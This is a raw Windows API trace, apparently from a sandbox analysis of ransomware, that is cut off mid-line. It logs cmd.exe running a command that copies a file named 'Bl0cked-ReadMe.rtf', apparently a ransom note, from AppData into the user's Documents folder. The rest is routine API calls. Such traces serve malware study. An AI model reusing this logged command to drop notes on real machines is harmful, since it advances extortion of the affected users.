region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16216 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16217 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16218 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 16219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16220 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16228 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 16229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16231 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16232 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16233 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16234 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16235 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 16236 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 16237 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 211 os_tid = 0x4d4 [0142.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9dc | out: lpSystemTimeAsFileTime=0x1ef9dc*(dwLowDateTime=0x8e987da0, dwHighDateTime=0x1d440a9)) [0142.045] GetCurrentProcessId () returned 0x738 [0142.045] GetCurrentThreadId () returned 0x4d4 [0142.045] GetTickCount () returned 0x2c7c1 [0142.045] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9d4 | out: lpPerformanceCount=0x1ef9d4*=19883397552) returned 1 [0142.045] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0142.045] __set_app_type (_Type=0x1) [0142.045] __p__fmode () returned 0x76b331f4 [0142.046] __p__commode () returned 0x76b331fc [0142.046] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0142.046] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.046] GetCurrentThreadId () returned 0x4d4 [0142.046] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4d4) returned 0x38 [0142.046] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.046] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.046] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.046] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef96c | out: phkResult=0x1ef96c*=0x0) returned 0x2 [0142.047] VirtualQuery (in: lpAddress=0x1ef9a3, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] GetConsoleOutputCP () returned 0x1b5 [0142.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.047] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.047] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.049] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.049] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.050] GetEnvironmentStringsW () returned 0x230168* [0142.050] FreeEnvironmentStringsW (penv=0x230168) returned 1 [0142.050] GetEnvironmentStringsW () returned 0x230168* [0142.050] FreeEnvironmentStringsW (penv=0x230168) returned 1 [0142.050] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8dc | out: phkResult=0x1ee8dc*=0x40) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x90, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x0, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.051] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.051] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.051] RegCloseKey (hKey=0x40) returned 0x0 [0142.052] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8dc | out: phkResult=0x1ee8dc*=0x40) returned 0x0 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x0, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.053] RegCloseKey (hKey=0x40) returned 0x0 [0142.053] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0142.053] srand (_Seed=0x5b886370) [0142.053] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0142.053] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0142.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.053] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2318c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.054] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.054] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.054] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.054] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.054] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.054] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.054] GetEnvironmentStringsW () returned 0x2322b8* [0142.054] FreeEnvironmentStringsW (penv=0x2322b8) returned 1 [0142.054] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.054] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.054] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.054] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.054] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.054] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.054] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef6a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef6a8, lpFilePart=0x1ef6a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef6a4*="Desktop") returned 0x18 [0142.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.055] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.056] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.056] GetEnvironmentStringsW () returned 0x232ad8* [0142.056] FreeEnvironmentStringsW (penv=0x232ad8) returned 1 [0142.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.056] GetConsoleOutputCP () returned 0x1b5 [0142.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.057] GetUserDefaultLCID () returned 0x409 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="0") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="0") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="1") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0142.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.059] GetConsoleTitleW (in: lpConsoleTitle=0x2208d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.061] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.061] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.061] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.061] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.061] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.061] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.061] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] GetFileType (hFile=0x7) returned 0x2 [0142.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef6e0 | out: lpMode=0x1ef6e0) returned 1 [0142.069] _dup (_FileHandle=1) returned 3 [0142.069] _close (_FileHandle=1) returned 0 [0142.070] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.070] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef6b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.071] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.071] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.072] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.072] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.072] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.072] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.073] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef044, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef044) returned 0x220e50 [0142.073] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.073] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.073] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.073] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1edf50, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.073] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] GetFileType (hFile=0x54) returned 0x1 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1edfa8 | out: lpFileSizeHigh=0x1edfa8*=0x0) returned 0x1632 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.074] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] GetFileType (hFile=0x4c) returned 0x1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] GetFileType (hFile=0x4c) returned 0x1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle 